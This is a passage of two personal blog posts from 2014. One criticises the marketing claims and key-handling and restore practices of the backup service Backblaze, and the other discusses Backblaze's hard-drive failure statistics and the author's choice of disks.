However, further down it says “Step 1, download younity for Windows or Mac, Step 2, install on iOS”. So, the “any file stored on any computer” claim is just not true if, like me you have a mixture of Linux machines, Android tablet and CyanogenMod ‘phone. I’m pretty sure that claim must breach some advertising standard and I’d complain if I cared about using the product. Fortunately I don’t.

Another “cloud” company making some interesting claims is Backblaze, the company whose blog commentary on consumer grade disks I referenced below. They supposedly offer a service with “unlimited storage”, which “automatically finds files” on your computer and then stores them in the Backblaze cloud with “military-grade encryption”. The website says that “everything except OS files” is backed up, so the system must have the freedom (and permissions) to ferret about on your local disk and then pass the files it finds out to Backblaze’s pods. Forgive me if I don’t like that idea.

The section about encryption is intriguing because it claims:

When you use Backblaze, data encryption is built in. Files scheduled for backup are encrypted on your machine. These encrypted files are then transferred over a secure SSL (https) connection to a Backblaze datacenter where they are stored encrypted on disk. We use a combination of proven industry standard public/private and symmetric encryption methods to accomplish this task. To a Backblaze customer all of this is invisible and automatic. For example, when you create your Backblaze account, we automatically generate your private key that is used to uniquely protect your data throughout our system.

They go on to say:

Upon arriving at a Backblaze datacenter, your data is assigned to one or more Storage Pods where it is stored encrypted. Access to your data is secured by your Backblaze account login information (your email address and password). When you provide these credentials, your private key is used to decrypt your data. At this point you can view your file/folder list and request a restore as desired.

A blog posting by Backblaze’s Tim Nufire gives some detail about how the company encrypts your data. On the face of it, the use of a 2048-bit RSA public/private key pair in conjunction with ephemeral 128-bit AES symmetric keys (to actually encrypt the data) looks impressive – particularly when the company claims that the private key can be further protected by encryption with a user provided passphrase. But given that the company is US based, that claim bothers me. I am particularly sceptical about any claims that the company is unable to decrypt private data because /they/ generate the public/private key pair and they admit (in the blog post) that they store the private key on their servers. Sorry, but if my data is private enough for me to wish to protect it with strong encryption, then I want to use keys I have generated myself, on a system which I control.

Backblaze’s description of the file restoration process does not give me any warm feeling either. Here is what they say:

When you request a data restore, we do what is known as a cloud restore. This simplifies the data restoration process. For example, let’s assume your hard drive crashes and you get a new hard drive or even a new computer. To restore your data you first log in to Backblaze using a web browser by providing your Backblaze account information (email address and password). Once you have logged in to the Backblaze secure web interface you can request a restore of your data. You do not have to install Backblaze to get your data back. To make this work, we decrypt your data on our secure restore servers and we then zip it and send it over an encrypted SSL connection to your computer. Once it arrives on your computer, you can unzip it and you have your data back.

So if I want my data back, they get a clear text copy of it all before sending it to me. Worse, they even offer to send it to me through the post on a USB disk.

I don’t call that a private recovery system.

Permanent link to this article: https://baldric.net/2014/01/22/dis-unity-2/

backblaze back seagate

In October last year I noted that the Western Digital “Green” drives in my desktop and a new RAID server build looked to be in imminent danger of early failure. That conclusion was based on a worryingly high load-cycle count which a series of posts around the net all attributed to the aggressive head parking features of these drives in order to save energy when not in use. I decided at the time to replace the desktop disk and recycle it to the RAID server. I have since decided to replace the entire RAID array as soon as I can. But which disks to use?

Well, Backblaze, a company which offers “unlimited” on-line backup storage for Mac and Windows users, has just published a rather useful set of statistics on the disks that they use in their storage arrays. The most interesting point is that they use the same domestic-grade disks as would be used by you or me rather than the commercial-grade ones used in high-end RAID systems.

According to the Backblaze blog post, at the end of 2013 they had 27,134 consumer-grade drives spinning in their “Storage Pods”. Those disks were mostly Seagate and Hitachi drives, with a (much) lower number of Western Digital drives also in use. Backblaze said:

Why do we have the drives we have? Basically, we buy the least expensive drives that will work. When a new drive comes on the market that looks like it would work, and the price is good, we test a pod full and see how they perform. The new drives go through initial setup tests, a stress test, and then a couple weeks in production. (A couple of weeks is enough to fill the pod with data.) If things still look good, that drive goes on the buy list. When the price is right, we buy it.

They also noted:

The drives that just don’t work in our environment are Western Digital Green 3TB drives and Seagate LP (low power) 2TB drives. Both of these drives start accumulating errors as soon as they are put into production. We think this is related to vibration. The drives do somewhat better in the new low-vibration Backblaze Storage Pod, but still not well enough.

These drives are designed to be energy-efficient, and spin down aggressively when not in use. In the Backblaze environment, they spin down frequently, and then spin right back up. We think that this causes a lot of wear on the drive.

Apart from the vibration point, I’d say that conclusion was spot-on given the reporting I have seen elsewhere. And the sheer number of drives they have in use gives a good solid statistical base upon which to draw when making future purchasing decisions. Backblaze note that the most reliable drives appear to be those made by Hitachi (they get “four nines” of untroubled operation time, while the other brands just get “two nines”) but they also note that the Hitachi drive business was bought by Western Digital around 18 months ago – and WD disks do not seem to perform anywhere near as well as the others in use.

The post concludes:

We are focusing on 4TB drives for new pods. For these, our current favorite is the Seagate Desktop HDD.15 (ST4000DM000). We’ll have to keep an eye on them, though. Historically, Seagate drives have performed well at first, and then had higher failure rates later.

Our other favorite is the Western Digital 3TB Red (WD30EFRX).

We still have to buy smaller drives as replacements for older pods where drives fail. The drives we absolutely won’t buy are Western Digital 3TB Green drives and Seagate 2TB LP drives.

So I guess I’ll be buying more Seagates in future – and I was right to dump the WD Caviar Green when I did.

(As an aside, I’m not convinced the Backblaze backup model is a good idea, but that is not the point here).

Permanent link to this article: https://baldric.net/2014/01/21/backblaze-back-seagate/